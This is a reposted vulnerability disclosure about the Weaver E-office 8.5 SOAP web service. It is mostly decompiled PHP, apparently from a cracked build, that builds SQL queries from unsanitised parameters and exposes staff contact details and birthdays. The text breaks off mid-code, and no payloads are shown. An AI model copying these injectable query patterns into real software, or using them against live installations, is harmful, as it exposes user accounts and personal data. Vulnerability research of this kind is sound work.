泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)

没穿底裤 2020年1月1日03:51:18评论466 views字数 27205阅读90分41秒阅读模式

看了wooyun个大牛发的这个产品的漏洞,感觉版本都过低,这里我发一个8.5的版本,里面新增了webservice的相关操作 下来看代码



漏洞作者: menmen519


看了wooyun个大牛发的这个产品的漏洞,感觉版本都过低,这里我发一个8.5的版本,里面新增了webservice的相关操作 下来看代码



<?php  /*********************/  /*                   */  /*  Dezend for PHP5  */  /*         NWS       */  /*      Nulled.WS    */  /*                   */  /*********************/    function UserLogin( $userAccount, $password )  {      global $connection;      global $_lang;      if ( trim( $userAccount ) == "" )      {          $userLoginReturn['code'] = "0x0000001";          return $userLoginReturn;      }      $checkUserAccountIsExsitQuery = "SELECT * FROM user WHERE USER_ACCOUNTS='".trim( $userAccount )."'";      $checkUserAccountIsExsitResult = exequery( $connection, $checkUserAccountIsExsitQuery );      if ( $checkUserAccountIsExsitRow = mysql_fetch_array( $checkUserAccountIsExsitResult ) )      {          if ( trim( $checkUserAccountIsExsitRow['USER_ACCOUNTS'] ) != trim( $userAccount ) )          {              $userLoginReturn['code'] = "0x0000002";              return $userLoginReturn;          }      }      else      {          $userLoginReturn['code'] = "0x0000002";          return $userLoginReturn;      }      $checkPasswordQuery = "SELECT PASSWORD FROM user WHERE USER_ACCOUNTS='".trim( $userAccount )."'";      $checkPasswordResult = exequery( $connection, $checkPasswordQuery );      $checkPasswordRow = mysql_fetch_array( $checkPasswordResult );      $myPassword = $checkPasswordRow['PASSWORD'];      if ( crypt( $password, $myPassword ) != $myPassword )      {          $userLoginReturn['code'] = "0x0000003";          return $userLoginReturn;      }      $query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";      $cursor = exequery( $connection, $query );      $ROW = mysql_fetch_array( $cursor );      $timenow = time( );      $CUR_TIME = date( "Y-m-d H:i:s", $timenow );      $query = "update USER set LAST_VISIT_TIME='{$CUR_TIME}' where USER_ID='".$ROW['USER_ID']."'";      exequery( $connection, $query );      $query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];      $cursor = exequery( $connection, $query );      if ( $ROW1 = mysql_fetch_array( $cursor ) )      {          $LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];      }      $LOGIN_THEME = $ROW['THEME'];      $template = $ROW['TEMPLATE'];      if ( !$template )      {          $template_query = "SELECT TEMPLATE_NAME FROM sys_template WHERE TEMPLATE_DEFAULT = 1 ";          $template_rs = exequery( $connection, $template_query );          if ( $row_tp = mysql_fetch_array( $template_rs ) )          {              $template = $row_tp['TEMPLATE_NAME'];          }          else          {              $template = "8series";          }      }      if ( $template == "8series" )      {          $mainUrl = "/general/index8.php";      }      else if ( $template == "7series" )      {          $mainUrl = "/general/index.php";      }      else      {          $mainUrl = "index8.php";      }      if ( $LOGIN_THEME == "" )      {          $LOGIN_THEME = "default";      }      $LOGIN_THEME = $template."/".$LOGIN_THEME;      session_start( );      $_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];      $_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];      $_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];      $_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];      $_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];      $_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];      $_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];      $_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;      $_SESSION['LOGIN_THEME'] = $LOGIN_THEME;      $_SESSION['LOGIN_LANG'] = "cn";      $_SESSION['LOGIN_LANG_ID'] = 1;      $infor['sessionID'] = session_id( );      $infor['userID'] = $ROW['USER_ID'];      $infor['deptID'] = $ROW['USER_ID'];      $infor['privID'] = $ROW['USER_PRIV'];      $infor['userName'] = $ROW['USER_NAME'];      $infor['userAccount'] = $ROW['USER_ACCOUNTS'];      $infor['avatarType'] = $ROW['AVATAR_TYPE'];      $query = "update USER set LAST_VISIT_TIME='{$CUR_TIME}' where USER_ID='".$ROW['USER_ID']."'";      exequery( $connection, $query );      add_log( 1, $_lang['common_login_from_PC'], $ROW['USER_ID'] );      $query = "SELECT * FROM `sys_para`;";      $result = exequery( $connection, $query );      while ( $row = mysql_fetch_array( $result ) )      {          switch ( $row['PARA_NAME'] )          {              case "slogan" :                  $infor['slogan'] = $row['PARA_VALUE'];                  break;              case "SMS_FREQUENCY" :                  $infor['smsFrequency'] = $row['PARA_VALUE'];                  break;          }      }      $query = "SELECT * FROM sys_upload WHERE MODULE_NAME='SMS' OR MODULE_NAME ='FILE'";      $result = exequery( $connection, $query );      while ( $row = mysql_fetch_array( $result ) )      {          if ( $row['MODULE_NAME'] == "SMS" )          {              $temp['maxNumber'] = $row['UPLOAD_MAX_NUM'];              $temp['singleMaxSize'] = $row['UPLOAD_SINGLE_MAX_SIZE'];              $temp['totalMaxSize'] = $row['UPLOAD_TOTAL_MAX_SIZE'];              $temp['denySuffix'] = "|".$row['DENY_SUFFIX']."|".UPLOADROLE;              $infor['smsUploadParam'] = $temp;          }          else if ( $row['MODULE_NAME'] == "FILE" )          {              $temp['maxNumber'] = $row['UPLOAD_MAX_NUM'];              $temp['singleMaxSize'] = $row['UPLOAD_SINGLE_MAX_SIZE'];              $temp['totalMaxSize'] = $row['UPLOAD_TOTAL_MAX_SIZE'];              $temp['denySuffix'] = "|".$row['DENY_SUFFIX']."|".UPLOADROLE;              $infor['documentUploadParam'] = $temp;          }      }      $userLoginReturn['code'] = "0x0000000";      $userLoginReturn['infor'] = $infor;      return $userLoginReturn;  }    function GetLanguage( )  {      global $connection;      $query = "SELECT LANG_ID,LANG_NAME FROM language";      $result = exequery( $connection, $query );      $language = array( );      while ( $row = mysql_fetch_array( $result ) )      {          $temp['langID'] = $row['LANG_ID'];          $temp['langName'] = $row['LANG_NAME'];          array_push( $language, $temp );      }      return $language;  }    function GetMenuLink( $funcCode, $funcName )  {      if ( trim( $funcCode ) == "" || trim( $funcCode ) == "@" )      {          $href = "";      }      else if ( strstr( $funcCode, "http://" ) || strstr( $funcCode, "workflow/new/do.php" ) || strstr( $funcCode, "workflow/new/freedo.php" ) )      {          if ( strstr( $funcCode, "workflow/new/do.php" ) || strstr( $funcCode, "workflow/new/freedo.php" ) )          {              $funcCode = "/general/".$funcCode;          }          if ( strstr( $funcCode, "workflow/new/do.php" ) || strstr( $funcCode, "workflow/new/freedo.php" ) )          {              $href = "/general/workflow/flow_redirect.php?url=".urlencode( $funcCode )."&FUNC_ID={$func_id}";          }          else          {              $href = $funcCode;          }      }      else if ( strstr( $funcCode, "file://" ) )      {          $winpath = str_replace( "//", "/", str_replace( "file://", "", $funcCode ) );          $winpath = base64_encode( $winpath );          $href = "/general/winexe/run_cache.php?path=".$winpath."&name=".urlencode( $funcName );      }      else if ( strstr( $funcCode, "*" ) )      {          $func_code = str_replace( "*", "", $funcCode );          $href = "/general/loginothersys/run_login.php?id=".$func_code;      }      else      {          $needle = "?";          $tmparray = explode( $needle, $funcCode );          if ( 1 < count( $tmparray ) )          {              $href = "/general/".$funcCode."&func_id={$func_id}";          }          else          {              $href = "/general/".$funcCode."?func_id={$func_id}";          }      }      return $href;  }    function GetUserFuncIDStr( $userPriv )  {      global $connection;      $query = "SELECT FUNC_ID_STR from USER_PRIV where USER_PRIV='".$userPriv."'";      $result = exequery( $connection, $query );      $row = mysql_fetch_array( $result );      return substr( $row['FUNC_ID_STR'], 0, -1 );  }    function GetCommonMenu( $userPriv, $userID, $langID )  {      global $connection;      $funcIDStr = getuserfuncidstr( $userPriv );      $funcIDStr = $funcIDStr == "" ? 0 : $funcIDStr;      $query = "SELECT /r/n/t/t/t/ta.FUNC_NAME AS FUNC_NAME_SYS,/r/n/t/t/t/ta.FUNC_NAME_PY AS FUNC_NAME_PY_SYS,/r/n/t/t/t/ta.FUNC_NAME_ZM AS FUNC_NAME_ZM_SYS,/r/n/t/t/t/tb.FUNC_ID,/r/n/t/t/t/tb.FUNC_NAME AS FUNC_NAME_USER,/r/n/t/t/t/tb.FUNC_NAME_PY AS FUNC_NAME_PY_USER,/r/n/t/t/t/tb.FUNC_NAME_ZM AS FUNC_NAME_ZM_USER,/r/n/t/t/t/tb.FUNC_CODE,/r/n/t/t/t/tb.FUNC_ISSYS,/r/n/t/t/t/tc.FUNC_IMG /r/n/t/t/t/tFROM menu_lang AS a /r/n/t/t/t/tJOIN user_menu AS b /r/n/t/t/t/tON a.FUNC_ID = b.FUNC_ID /r/n/t/t/t/tJOIN sys_function AS c /r/n/t/t/t/tON a.FUNC_ID = c.FUNC_ID /r/n/t/t/t/tWHERE ((b.FUNC_ID IN ({$funcIDStr}) AND b.FUNC_ISSYS=1 AND a.LANG_ID = ".$langID." ) /r/n/t/t/t/tOR b.FUNC_ISSYS=0) /r/n/t/t/t/tAND LEFT(b.FUNC_CODE,1)<>'@' /r/n/t/t/t/tAND b.FUNC_CODE <> '' /r/n/t/t/t/tAND b.USER_ID = '".$userID."' /r/n/t/t/t/tAND b.FUNC_ISSHOW = 1 /r/n/t/t/t/tORDER BY FREQUENCY DESC /r/n/t/t/t/tLIMIT 0,12";      $result = exequery( $connection, $query );      $returnArray = array( );      while ( $row = mysql_fetch_array( $result ) )      {          if ( $row['FUNC_ISSYS'] == 1 )          {              $funcName = $row['FUNC_NAME_SYS'];          }          else          {              $funcName = $row['FUNC_NAME_USER'];          }          $funcID = $row['FUNC_ID'];          $menuID = $row['MENU_ID'];          $funcCode = $row['FUNC_CODE'];          $funcImg = $row['FUNC_IMG'];          if ( $funcImg == "" )          {              $imgSrc = "/images/8/icons/48/".$funcID.".png";          }          else          {              $imgSrc = "/attachment/index/48/".$funcImg;          }          $imgSrc = file_exists( ROOT_PATH.$imgSrc ) ? $imgSrc : "/images/8/icons/48/default.png";          $tempArray['funcName'] = $funcName;          $tempArray['funcID'] = $funcID;          $tempArray['imageLink'] = $imgSrc;          $tempArray['menuLink'] = getmenulink( $funcCode, $funcName );          array_push( $returnArray, $tempArray );      }      return $returnArray;  }    function IsHaveChildrenMenu( $userID, $menuID, $funcIDStr )  {      global $connection;      $menuLength = strlen( $menuID );      $query = "SELECT COUNT(*) AS CNT FROM user_menu /r/n/t/t/t   WHERE LEFT(MENU_ID,".$menuLength.")='".$menuID."' /r/n/t/t/t   AND LENGTH(MENU_ID)=".( strlen( $menuID ) + 2 )." /r/n/t/t/t   AND USER_ID='".$userID."' /r/n/t/t/t   AND FUNC_ID IN ({$funcIDStr})/r/n/t/t/t   AND FUNC_ISSHOW = 1";      $result = exequery( $connection, $query );      if ( $row = mysql_fetch_array( $result ) )      {          if ( 0 < $row['CNT'] )          {              return true;          }          else          {              return false;          }      }  }    function GetAllMenu( $userPriv, $userID, $langID )  {      global $connection;      $funcIDStr = getuserfuncidstr( $userPriv );      $funcIDStr = $funcIDStr == "" ? 0 : $funcIDStr;      $query = "SELECT /r/n/t/t/t/ta.FUNC_NAME AS FUNC_NAME_SYS,/r/n/t/t/t/ta.FUNC_NAME_PY AS FUNC_NAME_PY_SYS,/r/n/t/t/t/ta.FUNC_NAME_ZM AS FUNC_NAME_ZM_SYS,/r/n/t/t/t/tb.FUNC_ID,/r/n/t/t/t/tb.FUNC_NAME AS FUNC_NAME_USER,/r/n/t/t/t/tb.FUNC_NAME_PY AS FUNC_NAME_PY_USER,/r/n/t/t/t/tb.FUNC_NAME_ZM AS FUNC_NAME_ZM_USER,/r/n/t/t/t/tb.FUNC_CODE,/r/n/t/t/t/tb.FUNC_ISSYS,/r/n/t/t/t/tb.MENU_ID,/r/n/t/t/t/tc.FUNC_IMG /r/n/t/t/t/tFROM menu_lang AS a /r/n/t/t/t/tRIGHT JOIN user_menu AS b /r/n/t/t/t/tON a.FUNC_ID = b.FUNC_ID /r/n/t/t/t/tLEFT JOIN sys_function AS c /r/n/t/t/t/tON a.FUNC_ID = c.FUNC_ID /r/n/t/t/t/tWHERE ((b.FUNC_ID IN ({$funcIDStr}) AND b.FUNC_ISSYS=1 AND a.LANG_ID = ".$langID.") /r/n/t/t/t/tOR b.FUNC_ISSYS=0) /r/n/t/t/t/tAND b.USER_ID = '".$userID."' /r/n/t/t/t/tAND b.FUNC_ISSHOW = 1 ORDER BY b.ORDER_ID ASC";      $result = exequery( $connection, $query );      $returnArray = array( );      while ( $row = mysql_fetch_array( $result ) )      {          if ( $row['FUNC_ISSYS'] == 1 )          {              $funcName = $row['FUNC_NAME_SYS'];              $funcNamePY = $row['FUNC_NAME_PY_SYS'];              $funcNameZM = $row['FUNC_NAME_ZM_SYS'];          }          else          {              $funcName = $row['FUNC_NAME_USER'];              $funcNamePY = $row['FUNC_NAME_PY_USER'];              $funcNameZM = $row['FUNC_NAME_ZM_USER'];          }          $funcID = $row['FUNC_ID'];          $menuID = $row['MENU_ID'];          $funcCode = $row['FUNC_CODE'];          $funcImg = $row['FUNC_IMG'];          $menuIDLength = strlen( $menuID );          if ( $funcCode == "" || strstr( $funcCode, "@" ) !== false )          {              $isParent = "true";          }          else          {              $isParent = "false";          }          if ( $isParent == "true" && !ishavechildrenmenu( $userID, $menuID, $funcIDStr ) )          {              continue;          }          if ( $funcImg == "" )          {              $imgSrc = "/images/8/icons/16/".$funcID.".png";          }          else          {              $imgSrc = "/attachment/index/16/".$funcImg;          }          $imgSrc = file_exists( ROOT_PATH.$imgSrc ) ? $imgSrc : "/images/8/icons/16/default.png";          $tempArray['isParent'] = $isParent;          $tempArray['funcName'] = $funcName;          $tempArray['funcNamePY'] = $funcNamePY;          $tempArray['funcNameZM'] = $funcNameZM;          $tempArray['funcID'] = $funcID;          $tempArray['imageLink'] = $imgSrc;          $tempArray['menuID'] = $menuID;          $tempArray['menuLink'] = getmenulink( $funcCode, $funcName );          array_push( $returnArray, $tempArray );      }      return $returnArray;  }    function GetMenuByUserID( $userID )  {      global $connection;      $query = "SELECT b.FUNC_ID_STR FROM user as a JOIN user_priv as b ON a.USER_PRIV=b.USER_PRIV WHERE a.USER_ID='".$userID."'";      $result = exequery( $connection, $query );      if ( $row = mysql_fetch_array( $result ) )      {          return $row['FUNC_ID_STR'];      }  }    function GetUser( )  {      global $connection;      $query = "SELECT a.*,b.DEPT_NAME,c.PRIV_NAME /r/n/t/t/t/tFROM user as a /r/n/t/t/t/tJOIN department as b /r/n/t/t/t/tON a.DEPT_ID = b.DEPT_ID /r/n/t/t/t/tJOIN user_priv as c /r/n/t/t/t/tON a.USER_PRIV = c.USER_PRIV /r/n/t/t/t/tWHERE a.DEPT_ID!=0 /r/n/t/t/t/tORDER BY a.LISTNUMBER,a.USER_NAME";      $result = exequery( $connection, $query );      $returnArray = array( );      while ( $row = mysql_fetch_array( $result ) )      {          $tempArray['deptID'] = $row['DEPT_ID'];          $tempArray['userID'] = $row['USER_ID'];          $tempArray['userName'] = $row['USER_NAME'];          $tempArray['userPriv'] = $row['USER_PRIV'];          $tempArray['avatarType'] = $row['AVATAR_TYPE'];          $tempArray['department'] = $row['DEPT_NAME'];          $tempArray['userPrivName'] = $row['PRIV_NAME'];          $tempArray['email'] = $row['EMAIL'];          $tempArray['phoneNumber'] = $row['MOBIL_NO'];          $tempArray['birthday'] = $row['BIRTHDAY'];          $tempArray['userNamePY'] = $row['USER_NAME_PY'];          $tempArray['userNameZM'] = $row['USER_NAME_ZM'];          array_push( $returnArray, $tempArray );      }      return $returnArray;  }    function GetDept( )  {      global $connection;      $query = "SELECT DEPT_ID,DEPT_NAME,DEPT_PARENT FROM department ORDER BY DEPT_NO ASC";      $result = exequery( $connection, $query );      $returnArray = array( );      while ( $row = mysql_fetch_array( $result ) )      {          $tempArray['deptID'] = $row['DEPT_ID'];          $tempArray['deptName'] = $row['DEPT_NAME'];          $tempArray['deptParent'] = $row['DEPT_PARENT'];          array_push( $returnArray, $tempArray );      }      return $returnArray;  }    function GetPriv( )  {      global $connection;      $query = "SELECT USER_PRIV,PRIV_NAME FROM user_priv ORDER BY PRIV_NO";      $result = exequery( $connection, $query );      $returnArray = array( );      while ( $row = mysql_fetch_array( $result ) )      {          $tempArray['privID'] = $row['USER_PRIV'];          $tempArray['privName'] = $row['PRIV_NAME'];          array_push( $returnArray, $tempArray );      }      return $returnArray;  }    function SendMessage( $fromUserID, $toUserID, $content, $attachmentID, $attachmentName )  {      global $connection;      $query = "INSERT INTO sms  /r/n/t/t/t(FROM_ID,TO_ID,SMS_TYPE,CONTENT,SEND_TIME,REMIND_FLAG,ATTACHMENT_ID,ATTACHMENT_NAME)/r/n/t/t/tVALUES /r/n/t/t/t('".$fromUserID."','".$toUserID."',0,'".$content."',NOW(),1,'".$attachmentID."','".$attachmentName."')";      return exequery( $connection, $query );  }    function GetMessage( $userID, $isOnlyNew )  {      global $connection;      $CUR_TIME = date( "Y-m-d H:i:s", time( ) );      $query = "SELECT * FROM sms /r/n/t/t/t/t/tWHERE TO_ID='".$userID."' /r/n/t/t/t/t/tAND receive_del = 0 /r/n/t/t/t/t/tAND send_del  !=1  /r/n/t/t/t/t/tAND SEND_TIME<='{$CUR_TIME}'";      $limit = " LIMIT 0,30";      if ( $isOnlyNew )      {          $query .= " AND REMIND_FLAG=1";          $limit = "";      }      $query .= " ORDER BY SEND_TIME DESC ".$limit;      $result = exequery( $connection, $query );      $returnArray = array( );      while ( $row = mysql_fetch_array( $result ) )      {          $tempArray['smsID'] = $row['SMS_ID'];          $tempArray['smsType'] = $row['SMS_TYPE'];          $tempArray['attachmentID'] = $row['ATTACHMENT_ID'];          $tempArray['attachmentName'] = $row['ATTACHMENT_NAME'];          $tempArray['fromUserID'] = $row['FROM_ID'];          $tempArray['fromUserName'] = getusernamenew( $row['FROM_ID'] );          $tempArray['fromUserAvatar'] = getuseravatartype( $row['FROM_ID'] );          $tempArray['content'] = $row['CONTENT'];          $tempArray['sendTime'] = $row['SEND_TIME'];          $typeArray = getsmstypeurl( $row['SMS_TYPE'], $row['CONTENT'], $row['TABLE_ID'], $row['TABLE_VAR'], $row['TABLE_NAME'], $userID );          $tempArray['typeText'] = $typeArray['TEXT'];          $tempArray['typeUrl'] = $typeArray['URL'];          array_push( $returnArray, $tempArray );      }      return $returnArray;  }    function SetMessageRead( $userID, $messageIDStr, $fromUserID )  {      global $connection;      $CUR_TIME = date( "Y-m-d H:i:s", time( ) );      $query = "UPDATE `sms`/r/n/t/t/t/tSET `REMIND_FLAG` = 0 WHERE SEND_TIME<='{$CUR_TIME}' AND TO_ID='".$userID."'";      if ( $fromUserID != "" )      {          $query .= " AND FROM_ID='".$fromUserID."'";      }      if ( $messageIDStr != "" )      {          $query .= " AND SMS_ID IN ({$messageIDStr})";      }      exequery( $connection, $query );  }    function CreateFile( $subject, $attachmentIDStr, $attachmentNameStr, $userID )  {      global $connection;      $currentTime = date( "Y-m-d H:i:s", time( ) );      $query = "INSERT INTO `file_content`/r/n/t/t/t/t(/r/n/t/t/t/t`CONTENT_TYPE`,/r/n/t/t/t/t`SORT_ID`,/r/n/t/t/t/t`FROM_ID`,/r/n/t/t/t/t`SUBJECT`,/r/n/t/t/t/t`SEND_TIME`,/r/n/t/t/t/t`USER_ID`,/r/n/t/t/t/t`ATTACHMENT_ID`,/r/n/t/t/t/t`ATTACHMENT_NAME`,/r/n/t/t/t/t`FILE_TYPE`)/r/n/t/t/t/tVALUES/r/n/t/t/t/t(/r/n/t/t/t/t1,/r/n/t/t/t/t-1,/r/n/t/t/t/t0,/r/n/t/t/t/t'".$subject."',/r/n/t/t/t/t'".$currentTime."',/r/n/t/t/t/t'".$userID."',/r/n/t/t/t/t'".$attachmentIDStr."',/r/n/t/t/t/t'".$attachmentNameStr."',/r/n/t/t/t/t1);";      exequery( $connection, $query );      return mysql_insert_id( );  }    function GetNewVersion( )  {      global $connection;      $getVersionQuery = "SELECT * FROM `client_version` ORDER BY DATE_TIME DESC LIMIT 0,1";      $getVersionResult = exequery( $connection, $getVersionQuery );      if ( $getVersionRow = mysql_fetch_array( $getVersionResult ) )      {          $return['version'] = $getVersionRow['VERSION'];          $getReadmeQuery = "SELECT * FROM `client_version_readme` WHERE CLIENT_VERSION_ID=".$getVersionRow['CLIENT_VERSION_ID'];          $getReadmeResult = exequery( $connection, $getReadmeQuery );          while ( $getReadmeRow = mysql_fetch_array( $getReadmeResult ) )          {              $temp['subject'] = $getReadmeRow['README_SUBJECT'];              $temp['describe'] = $getReadmeRow['README_DESCRIBE'];              $temp['image'] = $getReadmeRow['README_IMAGE'];              if ( !is_array( $return['readme'] ) )              {                  $return['readme'] = array( );              }              array_push( $return['readme'], $temp );          }      }      return $return;  }    function Attend( $userID, $deptID, $privID, $checkType )  {      $userInfor['UserId'] = $userID;      $userInfor['DepyId'] = $deptID;      $userInfor['PrivId'] = $privID;      $userInfor['LoginCheck'] = $checkType;      $attend = new attend( );      $result = $attend->GetLoginInOut( $userInfor );      if ( $checkType == "in" )      {          return $result['LoginInLateTime'];      }      else      {          return $result['LoginOutEarlyTime'];      }  }    function CheckIsSignIn( $userID )  {      $attend = new attend( );      $dutyId = $attend->getUserDutyType( $userID );      $dutyArray = $attend->getDutyData( $dutyId );      return $attend->isSignIn( $dutyArray, $dutyId, $userID );  }    include_once( "nusoap/lib/nusoap.php" );  include_once( "inc/conn.php" );  include_once( "api/user.class.php" );  include_once( "api/attend.class.php" );  include_once( "inc/utility_all.php" );  include_once( "general/workflow/prcs_role.php" );  include_once( "lang/cn/common.lang.php" );  $server = new soap_server( );  $server->soap_defencoding = "UTF-8";  $server->decode_utf8 = false;  $server->configureWSDL( "EofficeService", "urn:EofficeService" );  $server->wsdl->schemaTargetNamespace = "urn:EofficeService";  $server->wsdl->addComplexType( "UserLoginReturn", "complexType", "struct", "all", "", array( "code" => array( "name" => "code", "type" => "xsd:string" ), "infor" => array( "name" => "infor", "type" => "tns:userInforObj" ) ) );  $server->wsdl->addComplexType( "userInforObj", "complexType", "struct", "all", "", array( "sessionID" => array( "name" => "sessionID", "type" => "xsd:string" ), "userID" => array( "name" => "userID", "type" => "xsd:string" ), "deptID" => array( "name" => "deptID", "type" => "xsd:string" ), "privID" => array( "name" => "privID", "type" => "xsd:string" ), "userName" => array( "name" => "userName", "type" => "xsd:string" ), "userAccount" => array( "name" => "userAccount", "type" => "xsd:string" ), "avatarType" => array( "name" => "userAvatar", "type" => "xsd:string" ), "slogan" => array( "name" => "slogan", "type" => "xsd:string" ), "smsFrequency" => array( "name" => "smsFrequency", "type" => "xsd:string" ), "smsUploadParam" => array( "name" => "smsUploadParam", "type" => "tns:smsUploadParam" ), "documentUploadParam" => array( "name" => "documentUploadParam", "type" => "tns:documentUploadParam" ) ) );  $server->wsdl->addComplexType( "smsUploadParam", "complexType", "struct", "all", "", array( "maxNumber" => array( "name" => "maxNumber", "type" => "xsd:string" ), "singleMaxSize" => array( "name" => "singleMaxSize", "type" => "xsd:string" ), "totalMaxSize" => array( "name" => "totalMaxSize", "type" => "xsd:string" ), "denySuffix" => array( "name" => "denySuffix", "type" => "xsd:string" ) ) );  $server->wsdl->addComplexType( "documentUploadParam", "complexType", "struct", "all", "", array( "maxNumber" => array( "name" => "maxNumber", "type" => "xsd:string" ), "singleMaxSize" => array( "name" => "singleMaxSize", "type" => "xsd:string" ), "totalMaxSize" => array( "name" => "totalMaxSize", "type" => "xsd:string" ), "denySuffix" => array( "name" => "denySuffix", "type" => "xsd:string" ) ) );  $server->register( "UserLogin", array( "userAccount" => "xsd:string", "password" => "xsd:string" ), array( "return" => "tns:UserLoginReturn" ), "urn:EofficeService", "urn:EofficeService#UserLogin", "rpc", "encoded", "UserLogin" );  $server->wsdl->addComplexType( "languageRerurnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:languageReturn[]" ) ), "tns:languageReturn" );  $server->wsdl->addComplexType( "languageReturn", "complexType", "struct", "all", "", array( "langID" => array( "name" => "langID", "type" => "xsd:string" ), "langName" => array( "name" => "langName", "type" => "xsd:string" ) ) );  $server->register( "GetLanguage", array( ), array( "return" => "tns:languageRerurnArray" ), "urn:EofficeService", "urn:EofficeService#GetLanguage", "rpc", "encoded", "GetLanguage" );  $server->wsdl->addComplexType( "menuRerurnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:menuReturn[]" ) ), "tns:menuReturn" );  $server->wsdl->addComplexType( "menuReturn", "complexType", "struct", "all", "", array( "funcName" => array( "name" => "funcName", "type" => "xsd:string" ), "funcID" => array( "name" => "funcID", "type" => "xsd:string" ), "menuLink" => array( "name" => "menuLink", "type" => "xsd:string" ), "imageLink" => array( "name" => "imageLink", "type" => "xsd:string" ) ) );  $server->register( "GetCommonMenu", array( "userPriv" => "xsd:string", "userID" => "xsd:string", "langID" => "xsd:string" ), array( "return" => "tns:menuRerurnArray" ), "urn:EofficeService", "urn:EofficeService#GetCommonMenu", "rpc", "encoded", "GetCommonMenu" );  $server->wsdl->addComplexType( "allMenuRerurnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:allMenuReturn[]" ) ), "tns:allMenuReturn" );  $server->wsdl->addComplexType( "allMenuReturn", "complexType", "struct", "all", "", array( "funcName" => array( "name" => "funcName", "type" => "xsd:string" ), "funcNamePY" => array( "name" => "funcNamePY", "type" => "xsd:string" ), "funcNameZM" => array( "name" => "funcNameZM", "type" => "xsd:string" ), "funcID" => array( "name" => "funcID", "type" => "xsd:string" ), "menuLink" => array( "name" => "menuLink", "type" => "xsd:string" ), "menuID" => array( "name" => "menuID", "type" => "xsd:string" ), "isParent" => array( "name" => "isParent", "type" => "xsd:string" ), "imageLink" => array( "name" => "imageLink", "type" => "xsd:string" ) ) );  $server->register( "GetAllMenu", array( "userPriv" => "xsd:string", "userID" => "xsd:string", "langID" => "xsd:string" ), array( "return" => "tns:allMenuRerurnArray" ), "urn:EofficeService", "urn:EofficeService#GetAllMenu", "rpc", "encoded", "Get All Menu" );  $server->register( "GetMenuByUserID", array( "userID" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#GetMenuByUserID", "rpc", "encoded", "GetMenuByUserID" );  $server->wsdl->addComplexType( "userReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:userReturn[]" ) ), "tns:userReturn" );  $server->wsdl->addComplexType( "userReturn", "complexType", "struct", "all", "", array( "deptID" => array( "name" => "deptID", "type" => "xsd:string" ), "userPriv" => array( "name" => "userPriv", "type" => "xsd:string" ), "userID" => array( "name" => "userID", "type" => "xsd:string" ), "userName" => array( "name" => "userName", "type" => "xsd:string" ), "avatarType" => array( "name" => "avatarType", "type" => "xsd:string" ), "department" => array( "name" => "department", "type" => "xsd:string" ), "userPrivName" => array( "name" => "userPrivName", "type" => "xsd:string" ), "email" => array( "name" => "email", "type" => "xsd:string" ), "phoneNumber" => array( "name" => "phoneNumber", "type" => "xsd:string" ), "birthday" => array( "name" => "birthday", "type" => "xsd:string" ), "userNamePY" => array( "name" => "userNamePY", "type" => "xsd:string" ), "userNameZM" => array( "name" => "userNameZM", "type" => "xsd:string" ) ) );  $server->register( "GetUser", array( ), array( "return" => "tns:userReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetUser", "rpc", "encoded", "Get User" );  $server->wsdl->addComplexType( "deptReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:deptReturn[]" ) ), "tns:deptReturn" );  $server->wsdl->addComplexType( "deptReturn", "complexType", "struct", "all", "", array( "deptID" => array( "name" => "deptID", "type" => "xsd:string" ), "deptName" => array( "name" => "deptName", "type" => "xsd:string" ), "deptParent" => array( "name" => "deptParent", "type" => "xsd:string" ) ) );  $server->register( "GetDept", array( ), array( "return" => "tns:deptReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetDept", "rpc", "encoded", "Get Dept" );  $server->wsdl->addComplexType( "privReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:privReturn[]" ) ), "tns:privReturn" );  $server->wsdl->addComplexType( "privReturn", "complexType", "struct", "all", "", array( "privID" => array( "name" => "privID", "type" => "xsd:string" ), "privName" => array( "name" => "privName", "type" => "xsd:string" ) ) );  $server->register( "GetPriv", array( ), array( "return" => "tns:privReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetPriv", "rpc", "encoded", "Get Priv" );  $server->register( "SendMessage", array( "fromUserID" => "xsd:string", "toUserID" => "xsd:string", "content" => "xsd:string", "attachmentID" => "xsd:string", "attachmentName" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#SendMessage", "rpc", "encoded", "SendMessage" );  $server->wsdl->addComplexType( "messageReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:messageReturn[]" ) ), "tns:messageReturn" );  $server->wsdl->addComplexType( "messageReturn", "complexType", "struct", "all", "", array( "fromUserName" => array( "name" => "fromUserName", "type" => "xsd:string" ), "content" => array( "name" => "content", "type" => "xsd:string" ), "sendTime" => array( "name" => "sendTime", "type" => "xsd:string" ), "fromUserAvatar" => array( "name" => "fromUserAvatar", "type" => "xsd:string" ), "fromUserID" => array( "name" => "fromUserID", "type" => "xsd:string" ), "smsID" => array( "name" => "smsID", "type" => 